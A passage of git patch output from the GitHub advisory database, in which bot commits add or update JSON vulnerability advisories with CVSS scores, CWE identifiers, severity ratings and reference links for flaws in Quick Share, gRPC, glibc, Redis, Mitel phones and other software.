"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2024/11/GHSA-j9g6-vvr6-x5wm/GHSA-j9g6-vvr6-x5wm.json b/advisories/unreviewed/2024/11/GHSA-j9g6-vvr6-x5wm/GHSA-j9g6-vvr6-x5wm.json index 146ae3ed43ca3..b165c3c8a4888 100644 --- a/advisories/unreviewed/2024/11/GHSA-j9g6-vvr6-x5wm/GHSA-j9g6-vvr6-x5wm.json +++ b/advisories/unreviewed/2024/11/GHSA-j9g6-vvr6-x5wm/GHSA-j9g6-vvr6-x5wm.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-j9g6-vvr6-x5wm", - "modified": "2024-11-07T18:31:23Z", + "modified": "2025-07-23T21:36:43Z", "published": "2024-11-07T18:31:23Z", "aliases": [ "CVE-2024-10668" ], "details": "There exists an auth bypass in Google Quickshare where an attacker can upload an unknown file type to a victim. The root cause of the vulnerability lies in the fact that when a Payload Transfer frame of type FILE is sent to Quick Share, the file that is contained in this frame is written to disk in the Downloads folder. Quickshare normally deletes unkown files, however an attacker can send two Payload transfer frames of type FILE and the same payload ID. The deletion logic will only delete the first file and not the second. We recommend upgrading past commit 5d8b9156e0c339d82d3dab0849187e8819ad92c0 or Quick Share Windows v1.0.2002.2", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:A/AC:H/AT:N/PR:L/UI:A/VC:L/VI:H/VA:L/SC:L/SI:H/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:N/R:U/V:D/RE:L/U:Green" diff --git a/advisories/unreviewed/2024/11/GHSA-p9rf-64qj-22rw/GHSA-p9rf-64qj-22rw.json b/advisories/unreviewed/2024/11/GHSA-p9rf-64qj-22rw/GHSA-p9rf-64qj-22rw.json index 68b32e69d7102..7fc0a33ed843c 100644 --- a/advisories/unreviewed/2024/11/GHSA-p9rf-64qj-22rw/GHSA-p9rf-64qj-22rw.json +++ b/advisories/unreviewed/2024/11/GHSA-p9rf-64qj-22rw/GHSA-p9rf-64qj-22rw.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-p9rf-64qj-22rw", - "modified": "2024-11-26T18:38:52Z", + "modified": "2025-07-23T21:36:43Z", "published": "2024-11-26T18:38:52Z", "aliases": [ "CVE-2024-11407" ], "details": "There exists a denial of service through Data corruption in gRPC-C++ - gRPC-C++ servers with transmit zero copy enabled through the channel arg GRPC_ARG_TCP_TX_ZEROCOPY_ENABLED can experience data corruption issues. The data sent by the application may be corrupted before transmission over the network thus leading the receiver to receive an incorrect set of bytes causing RPC requests to fail. We recommend upgrading past commit e9046b2bbebc0cb7f5dc42008f807f6c7e98e791", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:N/R:A/V:X/RE:L/U:Green" diff --git a/advisories/unreviewed/2024/12/GHSA-3vm2-3vf9-9j39/GHSA-3vm2-3vf9-9j39.json b/advisories/unreviewed/2024/12/GHSA-3vm2-3vf9-9j39/GHSA-3vm2-3vf9-9j39.json index 238bad003c4c5..dcc14699ef878 100644 --- a/advisories/unreviewed/2024/12/GHSA-3vm2-3vf9-9j39/GHSA-3vm2-3vf9-9j39.json +++ b/advisories/unreviewed/2024/12/GHSA-3vm2-3vf9-9j39/GHSA-3vm2-3vf9-9j39.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-3vm2-3vf9-9j39", - "modified": "2024-12-10T15:32:31Z", + "modified": "2025-07-23T21:36:43Z", "published": "2024-12-10T15:32:31Z", "aliases": [ "CVE-2024-12236" ], "details": "A security issue exists in Vertex Gemini API for customers using VPC-SC. By utilizing a custom crafted file URI for image input, data exfiltration is possible due to requests being routed outside the VPC-SC security perimeter, circumventing the intended security restrictions of VPC-SC.\n\nNo further fix actions are needed. Google Cloud Platform implemented a fix to return an error message when a media file URL is specified in the fileUri parameter and VPC Service Controls is enabled. Other use cases are unaffected.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2025/05/GHSA-cfv9-2rgf-f55c/GHSA-cfv9-2rgf-f55c.json b/advisories/unreviewed/2025/05/GHSA-cfv9-2rgf-f55c/GHSA-cfv9-2rgf-f55c.json index 43e11da4afb39..e35112c585295 100644 --- a/advisories/unreviewed/2025/05/GHSA-cfv9-2rgf-f55c/GHSA-cfv9-2rgf-f55c.json +++ b/advisories/unreviewed/2025/05/GHSA-cfv9-2rgf-f55c/GHSA-cfv9-2rgf-f55c.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-cfv9-2rgf-f55c", - "modified": "2025-07-17T15:32:09Z", + "modified": "2025-07-23T21:36:43Z", "published": "2025-05-06T15:31:10Z", "aliases": [ "CVE-2025-4373" @@ -39,6 +39,10 @@ "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2025:11374" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2025:11662" + }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2025-4373" diff --git a/advisories/unreviewed/2025/07/GHSA-3h67-j53j-m22p/GHSA-3h67-j53j-m22p.json b/advisories/unreviewed/2025/07/GHSA-3h67-j53j-m22p/GHSA-3h67-j53j-m22p.json new file mode 100644 index 0000000000000..e07722368d421 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-3h67-j53j-m22p/GHSA-3h67-j53j-m22p.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3h67-j53j-m22p", + "modified": "2025-07-23T21:36:46Z", + "published": "2025-07-23T21:36:45Z", + "aliases": [ + "CVE-2025-44109" + ], + "details": "A URL redirection in Pinokio v3.6.23 allows attackers to redirect victim users to attacker-controlled pages.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-44109" + }, + { + "type": "WEB", + "url": "https://drive.google.com/file/d/12XY2WFBvGJ104gUvyG6YDIEdy4y1gl8i/view" + }, + { + "type": "WEB", + "url": "https://gist.github.com/Suuuuuzy/609c7b2e74a8cc16c8e0302a100b86e0" + }, + { + "type": "WEB", + "url": "https://suuuuuzy.github.io/mostly-harmless/pinokio_poc/index.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-601" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-23T20:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-4jf4-wr6q-827p/GHSA-4jf4-wr6q-827p.json b/advisories/unreviewed/2025/07/GHSA-4jf4-wr6q-827p/GHSA-4jf4-wr6q-827p.json new file mode 100644 index 0000000000000..c8f23ff86dc2a --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-4jf4-wr6q-827p/GHSA-4jf4-wr6q-827p.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4jf4-wr6q-827p", + "modified": "2025-07-23T21:36:46Z", + "published": "2025-07-23T21:36:45Z", + "aliases": [ + "CVE-2025-50477" + ], + "details": "A URL redirection in lbry-desktop v0.53.9 allows attackers to redirect victim users to attacker-controlled pages.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50477" + }, + { + "type": "WEB", + "url": "https://drive.google.com/file/d/1HLxOWDSq6DHeZTVNcY0Tgkcd_eWTqYAS/view" + }, + { + "type": "WEB", + "url": "https://gist.github.com/Suuuuuzy/a3df9e88a41f9641c37e6d663f9b539c" + }, + { + "type": "WEB", + "url": "https://suuuuuzy.github.io/mostly-harmless/lbry_poc/index.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-601" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-23T19:15:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-4xw2-w53m-rwj2/GHSA-4xw2-w53m-rwj2.json b/advisories/unreviewed/2025/07/GHSA-4xw2-w53m-rwj2/GHSA-4xw2-w53m-rwj2.json index 0287aedce4f19..9d89268f3ba5d 100644 --- a/advisories/unreviewed/2025/07/GHSA-4xw2-w53m-rwj2/GHSA-4xw2-w53m-rwj2.json +++ b/advisories/unreviewed/2025/07/GHSA-4xw2-w53m-rwj2/GHSA-4xw2-w53m-rwj2.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-4xw2-w53m-rwj2", - "modified": "2025-07-21T09:33:26Z", + "modified": "2025-07-23T21:36:45Z", "published": "2025-07-21T09:33:26Z", "aliases": [ "CVE-2025-24936" ], "details": "The web application allows user input to pass unfiltered to a command executed on the underlying operating system. The vulnerable component is bound to the network stack and the set of possible attackers extends up to and including the entire Internet.\n\nAn attacker with low privileged access to the application has the potential to execute commands on the operating system under the context of the webserver.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-78" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-21T07:15:23Z" diff --git a/advisories/unreviewed/2025/07/GHSA-676m-p53v-8qw7/GHSA-676m-p53v-8qw7.json b/advisories/unreviewed/2025/07/GHSA-676m-p53v-8qw7/GHSA-676m-p53v-8qw7.json new file mode 100644 index 0000000000000..ef10191085326 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-676m-p53v-8qw7/GHSA-676m-p53v-8qw7.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-676m-p53v-8qw7", + "modified": "2025-07-23T21:36:45Z", + "published": "2025-07-23T21:36:45Z", + "aliases": [ + "CVE-2025-47187" + ], + "details": "A vulnerability in the Mitel 6800 Series, 6900 Series, and 6900w Series SIP Phones, including the 6970 Conference Unit through 6.4 SP4, could allow an unauthenticated attacker to perform a file upload attack due to missing authentication mechanisms. A successful exploit could allow an attacker to upload arbitrary WAV files, which may potentially exhaust the phone's storage without affecting the phone's availability or operation.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-47187" + }, + { + "type": "WEB", + "url": "https://www.mitel.com/support/security-advisories" + }, + { + "type": "WEB", + "url": "https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-misa-2025-0004" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-23T19:15:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-8xjp-c72j-67q8/GHSA-8xjp-c72j-67q8.json b/advisories/unreviewed/2025/07/GHSA-8xjp-c72j-67q8/GHSA-8xjp-c72j-67q8.json new file mode 100644 index 0000000000000..bf438326baa28 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-8xjp-c72j-67q8/GHSA-8xjp-c72j-67q8.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8xjp-c72j-67q8", + "modified": "2025-07-23T21:36:46Z", + "published": "2025-07-23T21:36:45Z", + "aliases": [ + "CVE-2025-8058" + ], + "details": "The regcomp function in the GNU C library version from 2.4 to 2.41 is \nsubject to a double free if some previous allocation fails. It can be \naccomplished either by a malloc failure or by using an interposed malloc\n that injects random malloc failures. The double free can allow buffer \nmanipulation depending of how the regex is constructed. This issue \naffects all architectures and ABIs supported by the GNU C library.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:P/VC:L/VI:L/VA:H/SC:L/SI:L/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8058" + }, + { + "type": "WEB", + "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=33185" + }, + { + "type": "WEB", + "url": "https://sourceware.org/git/?p=glibc.git;a=commit;h=3ff17af18c38727b88d9115e536c069e6b5d601f" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-415" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-23T20:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-f46f-fjf4-h4m2/GHSA-f46f-fjf4-h4m2.json b/advisories/unreviewed/2025/07/GHSA-f46f-fjf4-h4m2/GHSA-f46f-fjf4-h4m2.json new file mode 100644 index 0000000000000..dd2d9524f6b93 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-f46f-fjf4-h4m2/GHSA-f46f-fjf4-h4m2.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f46f-fjf4-h4m2", + "modified": "2025-07-23T21:36:45Z", + "published": "2025-07-23T21:36:45Z", + "aliases": [ + "CVE-2025-46686" + ], + "details": "Redis through 7.4.3 allows memory consumption via a multi-bulk command composed of many bulks, sent by an authenticated user. This occurs because the server allocates memory for the command arguments of every bulk, even when the command is skipped because of insufficient permissions.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46686" + }, + { + "type": "WEB", + "url": "https://github.com/io-no/CVE-Reports/issues/1" + }, + { + "type": "WEB", + "url": "https://github.com/redis/redis" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-789" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-23T19:15:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-j8hp-g4wv-c9xj/GHSA-j8hp-g4wv-c9xj.json b/advisories/unreviewed/2025/07/GHSA-j8hp-g4wv-c9xj/GHSA-j8hp-g4wv-c9xj.json index 0693e2b60a7eb..c111b29697784 100644 --- a/advisories/unreviewed/2025/07/GHSA-j8hp-g4wv-c9xj/GHSA-j8hp-g4wv-c9xj.json +++ b/advisories/unreviewed/2025/07/GHSA-j8hp-g4wv-c9xj/GHSA-j8hp-g4wv-c9xj.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-j8hp-g4wv-c9xj", - "modified": "2025-07-21T09:33:26Z", + "modified": "2025-07-23T21:36:45Z", "published": "2025-07-21T09:33:26Z", "aliases": [ "CVE-2025-24937" ], "details": "File contents could be read from the local file system by an attacker. Additionally, malicious code could be inserted in the file, leading to a full compromise of the web application and the container it is running on.\n\nThe vulnerable component is bound to the network stack and the set of possible attackers extends up to and including the entire Internet. The web application allows arbitrary files to be included in a file that was downloadable and executable by the web server.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-98" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-21T07:15:24Z" diff --git a/advisories/unreviewed/2025/07/GHSA-jp65-2h7q-qfg7/GHSA-jp65-2h7q-qfg7.json b/advisories/unreviewed/2025/07/GHSA-jp65-2h7q-qfg7/GHSA-jp65-2h7q-qfg7.json index 7c7a8415d2b37..19b3f4edade8f 100644 --- a/advisories/unreviewed/2025/07/GHSA-jp65-2h7q-qfg7/GHSA-jp65-2h7q-qfg7.json +++ b/advisories/unreviewed/2025/07/GHSA-jp65-2h7q-qfg7/GHSA-jp65-2h7q-qfg7.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-jp65-2h7q-qfg7", - "modified": "2025-07-23T12:30:25Z", + "modified": "2025-07-23T21:36:45Z", "published": "2025-07-23T12:30:25Z", "aliases": [ "CVE-2025-53882" ], "details": "A Reliance on Untrusted Inputs in a Security Decision vulnerability in the logrotate configuration for openSUSEs mailman3 package allows potential escalation from mailman to rootThis issue affects openSUSE Tumbleweed: from ? before 3.3.10-2.1.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-807" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-23T10:15:24Z" diff --git a/advisories/unreviewed/2025/07/GHSA-rj69-p564-922p/GHSA-rj69-p564-922p.json b/advisories/unreviewed/2025/07/GHSA-rj69-p564-922p/GHSA-rj69-p564-922p.json index 630ce334d44b4..7ee23260d763f 100644 --- a/advisories/unreviewed/2025/07/GHSA-rj69-p564-922p/GHSA-rj69-p564-922p.json +++ b/advisories/unreviewed/2025/07/GHSA-rj69-p564-922p/GHSA-rj69-p564-922p.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-rj69-p564-922p", - "modified": "2025-07-21T09:33:26Z", + "modified": "2025-07-23T21:36:45Z", "published": "2025-07-21T09:33:26Z", "aliases": [ "CVE-2025-24938" ], "details": "The web application allows user input to pass unfiltered to a command executed on the underlying operating system. An attacker with high privileged access (administrator) to the application has the potential execute commands on the operating system under the context of the webserver.\n\nThe vulnerable component is bound to the network stack and the set of possible attackers extends up to and including the entire Internet. Has the potential to inject command while creating a new User from User Management.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-21T07:15:24Z" diff --git a/advisories/unreviewed/2025/07/GHSA-v669-7gjg-96jr/GHSA-v669-7gjg-96jr.json b/advisories/unreviewed/2025/07/GHSA-v669-7gjg-96jr/GHSA-v669-7gjg-96jr.json index e5080d101f9e4..b03e81d2c29ec 100644 --- a/advisories/unreviewed/2025/07/GHSA-v669-7gjg-96jr/GHSA-v669-7gjg-96jr.json +++ b/advisories/unreviewed/2025/07/GHSA-v669-7gjg-96jr/GHSA-v669-7gjg-96jr.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-v669-7gjg-96jr", - "modified": "2025-07-22T12:30:43Z", + "modified": "2025-07-23T21:36:45Z", "published": "2025-07-22T12:30:43Z", "aliases": [ "CVE-2025-7427" ], "details": "Uncontrolled Search Path Element in Arm Development Studio before 2025 may allow an attacker to perform a DLL hijacking attack. Successful exploitation could lead to local arbitrary code execution in the context of the user running Arm Development Studio.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-427" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-22T10:15:25Z" diff --git a/advisories/unreviewed/2025/07/GHSA-vqmp-p2v4-jvvq/GHSA-vqmp-p2v4-jvvq.json b/advisories/unreviewed/2025/07/GHSA-vqmp-p2v4-jvvq/GHSA-vqmp-p2v4-jvvq.json index 0d439a598c3e1..a1afa8788700a 100644 --- a/advisories/unreviewed/2025/07/GHSA-vqmp-p2v4-jvvq/GHSA-vqmp-p2v4-jvvq.json +++ b/advisories/unreviewed/2025/07/GHSA-vqmp-p2v4-jvvq/GHSA-vqmp-p2v4-jvvq.json @@ -26,7 +26,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-277" + "CWE-277", + "CWE-732" ], "severity": "MODERATE", "github_reviewed": false, From a82e3f4a7b017945368b7c99df7d80e667116112 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 23 Jul 2025 22:14:54 +0000 Subject: [PATCH 129/323] Publish Advisories GHSA-3wf4-68gx-mph8 GHSA-q3rp-vvm7-j8jg --- .../2024/11/GHSA-3wf4-68gx-mph8/GHSA-3wf4-68gx-mph8.json | 2 +- .../2024/11/GHSA-q3rp-vvm7-j8jg/GHSA-q3rp-vvm7-j8jg.json | 3 ++- 2 files changed, 3 insertions(+), 2 deletions(-) diff --git a/advisories/github-reviewed/2024/11/GHSA-3wf4-68gx-mph8/GHSA-3wf4-68gx-mph8.json b/advisories/github-reviewed/2024/11/GHSA-3wf4-68gx-mph8/GHSA-3wf4-68gx-mph8.json index 1a860cee96429..4996fe695a12c 100644 --- a/advisories/github-reviewed/2024/11/GHSA-3wf4-68gx-mph8/GHSA-3wf4-68gx-mph8.json +++ b/advisories/github-reviewed/2024/11/GHSA-3wf4-68gx-mph8/GHSA-3wf4-68gx-mph8.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-3wf4-68gx-mph8", - "modified": "2024-11-18T20:04:30Z", + "modified": "2025-07-23T22:12:58Z", "published": "2024-11-18T12:30:42Z", "aliases": [ "CVE-2024-11023" diff --git a/advisories/github-reviewed/2024/11/GHSA-q3rp-vvm7-j8jg/GHSA-q3rp-vvm7-j8jg.json b/advisories/github-reviewed/2024/11/GHSA-q3rp-vvm7-j8jg/GHSA-q3rp-vvm7-j8jg.json index 76f8ee8778905..2a4c7c60be458 100644 --- a/advisories/github-reviewed/2024/11/GHSA-q3rp-vvm7-j8jg/GHSA-q3rp-vvm7-j8jg.json +++ b/advisories/github-reviewed/2024/11/GHSA-q3rp-vvm7-j8jg/GHSA-q3rp-vvm7-j8jg.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-q3rp-vvm7-j8jg", - "modified": "2024-11-06T19:54:52Z", + "modified": "2025-07-23T22:13:25Z", "published": "2024-11-04T12:32:56Z", "aliases": [ "CVE-2024-10389" @@ -59,6 +59,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-22", "CWE-427" ], "severity": "MODERATE", From 65d640a2a94a51bc29a8de944c0367f9ea843390 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 23 Jul 2025 22:17:25 +0000 Subject: [PATCH 130/323] Publish Advisories GHSA-9g4j-v8w5-7x42 GHSA-f9vc-vf3r-pqqq GHSA-r5p3-955p-5ggq --- .../2025/07/GHSA-9g4j-v8w5-7x42/GHSA-9g4j-v8w5-7x42.json | 8 ++++++-- .../2025/07/GHSA-f9vc-vf3r-pqqq/GHSA-f9vc-vf3r-pqqq.json | 8 ++++++-- .../2025/07/GHSA-r5p3-955p-5ggq/GHSA-r5p3-955p-5ggq.json | 8 ++++++-- 3 files changed, 18 insertions(+), 6 deletions(-) diff --git a/advisories/github-reviewed/2025/07/GHSA-9g4j-v8w5-7x42/GHSA-9g4j-v8w5-7x42.json b/advisories/github-reviewed/2025/07/GHSA-9g4j-v8w5-7x42/GHSA-9g4j-v8w5-7x42.json index 67839160b99a4..c7a5a67b776b3 100644 --- a/advisories/github-reviewed/2025/07/GHSA-9g4j-v8w5-7x42/GHSA-9g4j-v8w5-7x42.json +++ b/advisories/github-reviewed/2025/07/GHSA-9g4j-v8w5-7x42/GHSA-9g4j-v8w5-7x42.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-9g4j-v8w5-7x42", - "modified": "2025-07-22T14:31:12Z", + "modified": "2025-07-23T22:15:09Z", "published": "2025-07-22T14:31:12Z", "aliases": [ "CVE-2025-53942" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/goauthentik/authentik/security/advisories/GHSA-9g4j-v8w5-7x42" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53942" + }, { "type": "WEB", "url": "https://github.com/goauthentik/authentik/commit/7a4c6b9b50f8b837133a7a1fd2cb9b7f18a145cd" @@ -64,6 +68,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2025-07-22T14:31:12Z", - "nvd_published_at": null + "nvd_published_at": "2025-07-23T21:15:26Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2025/07/GHSA-f9vc-vf3r-pqqq/GHSA-f9vc-vf3r-pqqq.json b/advisories/github-reviewed/2025/07/GHSA-f9vc-vf3r-pqqq/GHSA-f9vc-vf3r-pqqq.json index e1d0819f075fb..05e14825eb9f7 100644 --- a/advisories/github-reviewed/2025/07/GHSA-f9vc-vf3r-pqqq/GHSA-f9vc-vf3r-pqqq.json +++ b/advisories/github-reviewed/2025/07/GHSA-f9vc-vf3r-pqqq/GHSA-f9vc-vf3r-pqqq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-f9vc-vf3r-pqqq", - "modified": "2025-07-23T14:40:05Z", + "modified": "2025-07-23T22:14:58Z", "published": "2025-07-23T14:40:05Z", "aliases": [ "CVE-2025-32019" @@ -97,6 +97,10 @@ "type": "WEB", "url": "https://github.com/goharbor/harbor/security/advisories/GHSA-f9vc-vf3r-pqqq" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-32019" + }, { "type": "WEB", "url": "https://github.com/goharbor/harbor/commit/76c2c5f7cfd9edb356cbb373889a59cc3217a058" @@ -121,6 +125,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2025-07-23T14:40:05Z", - "nvd_published_at": null + "nvd_published_at": "2025-07-23T21:15:26Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2025/07/GHSA-r5p3-955p-5ggq/GHSA-r5p3-955p-5ggq.json b/advisories/github-reviewed/2025/07/GHSA-r5p3-955p-5ggq/GHSA-r5p3-955p-5ggq.json index 7594cb7805d96..8c740dafc95c7 100644 --- a/advisories/github-reviewed/2025/07/GHSA-r5p3-955p-5ggq/GHSA-r5p3-955p-5ggq.json +++ b/advisories/github-reviewed/2025/07/GHSA-r5p3-955p-5ggq/GHSA-r5p3-955p-5ggq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-r5p3-955p-5ggq", - "modified": "2025-07-22T14:24:19Z", + "modified": "2025-07-23T22:15:03Z", "published": "2025-07-22T14:24:19Z", "aliases": [ "CVE-2025-47281" @@ -43,6 +43,10 @@ "type": "WEB", "url": "https://github.com/kyverno/kyverno/security/advisories/GHSA-r5p3-955p-5ggq" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-47281" + }, { "type": "WEB", "url": "https://github.com/kyverno/kyverno/commit/cbd7d4ca24de1c55396fc3295e9fc3215832be7c" @@ -60,6 +64,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2025-07-22T14:24:19Z", - "nvd_published_at": null + "nvd_published_at": "2025-07-23T21:15:26Z" } } \ No newline at end of file From 25606640f120b0dd142f66362d44e485094defcb Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> 